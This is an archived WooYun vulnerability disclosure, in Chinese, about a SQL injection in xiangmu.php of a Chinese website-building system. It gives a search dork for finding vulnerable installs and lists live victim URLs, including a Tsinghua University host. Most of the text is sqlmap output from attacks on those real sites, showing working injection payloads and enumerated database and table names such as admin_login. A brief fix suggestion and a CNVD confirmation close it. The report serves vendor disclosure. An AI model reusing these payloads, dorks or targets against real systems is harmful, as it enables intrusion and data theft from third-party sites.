乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-09: 细节已通知厂商并且等待厂商处理中 2015-03-13: 厂商已经确认,细节仅向厂商公开 2015-03-16: 细节向第三方安全合作伙伴开放 2015-05-07: 细节向核心白帽子及相关领域专家公开 2015-05-17: 细节向普通白帽子公开 2015-05-27: 细节向实习白帽子公开 2015-06-11: 细节向公众公开
某通用型建站系统某处SQL注射漏洞
1、建站程序类型:php+mysql2、漏洞类型:SQL注入3、缺陷文件:xiangmu.php4、注入参数:5、危害程度:中等(泄及大量edu清华大学躺枪)6、涉及厂商:北京祥云时代科技有限公司7、厂商网站:http://www.8eee.org/8、安装量:中等9、是否拥有源代码:无10、关键字:inurl:xiangmu.php?id=提供搜索地址:http://74.125.227.77/search?q=inurl:xiangmu.php%3Fid%3D&newwindow=1&ei=sgnmU-qQLqfW8AHe8oHIBw&start=0&sa=N&biw=1362&bih=73411、枚举案例:http://www.tcztb.com/huiyuan/xiangmu.php?id=569http://www.tcztb.com/huiyuan/xiangmu.php?id=42http://ee.nedu.edu.cn:8088/dianqikongzhi/iframe/xiangmu.php?id=6http://oa.ie.tsinghua.edu.cn/beika/xiangmu.php?id=4(清华大学)http://www.bjzjygj.com/xiangmu.php?id=86用谷歌搜索吧
[root@Hacker~]# Sqlmap sqlmap -u "http://www.tcztb.com/huiyuan/xiangmu.php?id=569" sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 15:17:12[15:17:12] [INFO] resuming back-end DBMS 'mysql'[15:17:12] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=426 AND 4483=4483 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=426 AND (SELECT 7233 FROM(SELECT COUNT(*),CONCAT(0x3a6165783a,(SELECT (CASE WHEN (7233=7233) THEN 1 ELSE 0 END)),0x3a716d633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: id=426 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6165783a,0x6b785a7143776c46415a,0x3a716d633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=426 AND SLEEP(5)---[15:17:13] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: ASP.NET, PHP 5.2.17back-end DBMS: MySQL 5.0[15:17:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[15:17:13] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tcztb.com'[*] shutting down at 15:17:13[root@Hacker~]# Sqlmap sqlmap -u "http://www.tcztb.com/huiyuan/xiangmu.php?id=569" --tables sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 15:17:22[15:17:22] [INFO] resuming back-end DBMS 'mysql'[15:17:22] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=426 AND 4483=4483 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=426 AND (SELECT 7233 FROM(SELECT COUNT(*),CONCAT(0x3a6165783a,(SELECT (CASE WHEN (7233=7233) THEN 1 ELSE 0 END)),0x3a716d633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: id=426 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6165783a,0x6b785a7143776c46415a,0x3a716d633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=426 AND SLEEP(5)---[15:17:22] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: ASP.NET, PHP 5.2.17back-end DBMS: MySQL 5.0[15:17:22] [INFO] fetching database names[15:17:22] [INFO] fetching tables for databases: 'information_schema, tcztb'Database: tcztb[21 tables]+---------------------------------------+| admin_authority || admin_login || admininfo || advanced || big_class || count || files || info || information1 || ip || message || sec_class || third_class || user_hj || user_xm || user_xx || user_xz || user_yj || user_zl || user_zs || user_zz |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+[15:17:23] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[15:17:23] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tcztb.com'[*] shutting down at 15:17:23——————————————————————————————————————————————————第二个案例[root@Hacker~]# Sqlmap sqlmap -u "http://www.tcztb.com/huiyuan/xiangmu.php?id=42" sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 15:18:26[15:18:26] [INFO] resuming back-end DBMS 'mysql'[15:18:26] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=426 AND 4483=4483 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=426 AND (SELECT 7233 FROM(SELECT COUNT(*),CONCAT(0x3a6165783a,(SELECT (CASE WHEN (7233=7233) THEN 1 ELSE 0 END)),0x3a716d633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: id=426 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6165783a,0x6b785a7143776c46415a,0x3a716d633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=426 AND SLEEP(5)---[15:18:26] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: ASP.NET, PHP 5.2.17back-end DBMS: MySQL 5.0[15:18:26] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[15:18:26] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tcztb.com'[*] shutting down at 15:18:26[root@Hacker~]# Sqlmap sqlmap -u "http://www.tcztb.com/huiyuan/xiangmu.php?id=42" --tables sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 15:18:30[15:18:30] [INFO] resuming back-end DBMS 'mysql'[15:18:30] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=426 AND 4483=4483 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=426 AND (SELECT 7233 FROM(SELECT COUNT(*),CONCAT(0x3a6165783a,(SELECT (CASE WHEN (7233=7233) THEN 1 ELSE 0 END)),0x3a716d633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: id=426 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6165783a,0x6b785a7143776c46415a,0x3a716d633a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=426 AND SLEEP(5)---[15:18:31] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: ASP.NET, PHP 5.2.17back-end DBMS: MySQL 5.0[15:18:31] [INFO] fetching database names[15:18:31] [INFO] fetching tables for databases: 'information_schema, tcztb'Database: tcztb[21 tables]+---------------------------------------+| admin_authority || admin_login || admininfo || advanced || big_class || count || files || info || information1 || ip || message || sec_class || third_class || user_hj || user_xm || user_xx || user_xz || user_yj || user_zl || user_zs || user_zz |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+[15:18:31] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[15:18:31] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\www.tcztb.com'[*] shutting down at 15:18:31———————————————————————————————————————————————————第三个案例[root@Hacker~]# Sqlmap sqlmap -u "http://ee.nedu.edu.cn:8088/dianqikongzhi/iframe/xiangmu.php?id=6" sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 15:19:33[15:19:33] [INFO] resuming back-end DBMS 'mysql'[15:19:33] [INFO] testing connection to the target url[15:19:34] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the testssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 7436=7436 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=6 AND (SELECT 6329 FROM(SELECT COUNT(*),CONCAT(0x3a7a61723a,(SELECT (CASE WHEN (6329=6329) THEN 1 ELSE 0 END)),0x3a7071723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: id=6 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a7a61723a,0x496f43784c754f6d794d,0x3a7071723a), NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=6 AND SLEEP(5)---[15:19:34] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.6, Apache 2.2.8back-end DBMS: MySQL 5.0[15:19:34] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[15:19:34] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\ee.nedu.edu.cn'[*] shutting down at 15:19:34[root@Hacker~]# Sqlmap sqlmap -u "http://ee.nedu.edu.cn:8088/dianqikongzhi/iframe/xiangmu.php?id=6" --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 15:19:52[15:19:52] [INFO] resuming back-end DBMS 'mysql'[15:19:52] [INFO] testing connection to the target url[15:19:53] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the testssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 7436=7436 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=6 AND (SELECT 6329 FROM(SELECT COUNT(*),CONCAT(0x3a7a61723a,(SELECT (CASE WHEN (6329=6329) THEN 1 ELSE 0 END)),0x3a7071723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: id=6 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a7a61723a,0x496f43784c754f6d794d,0x3a7071723a), NULL, NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=6 AND SLEEP(5)---[15:19:53] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.6, Apache 2.2.8back-end DBMS: MySQL 5.0[15:19:53] [INFO] fetching database names[15:19:53] [INFO] the SQL query used returns 9 entries[15:19:53] [INFO] resumed: "information_schema"[15:19:53] [INFO] resumed: "bbs"[15:19:53] [INFO] resumed: "dianqikongzhi"[15:19:53] [INFO] resumed: "ee_feng"[15:19:53] [INFO] resumed: "experiment"[15:19:53] [INFO] resumed: "jidianbaohujingpinke"[15:19:53] [INFO] resumed: "mysql"[15:19:53] [INFO] resumed: "phpcmsv9"[15:19:53] [INFO] resumed: "ultrax"available databases [9]:[*] bbs[*] dianqikongzhi[*] ee_feng[*] experiment[*] information_schema[*] jidianbaohujingpinke[*] mysql[*] phpcmsv9[*] ultrax[15:19:53] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[15:19:53] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\????\SQLMAP~3\Bin\output\ee.nedu.edu.cn'[*] shutting down at 15:19:53
加强SQL注入保护
危害等级:高
漏洞Rank:13
确认时间:2015-03-13 17:52
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向网站管理单位(软件生产厂商)通报。
暂无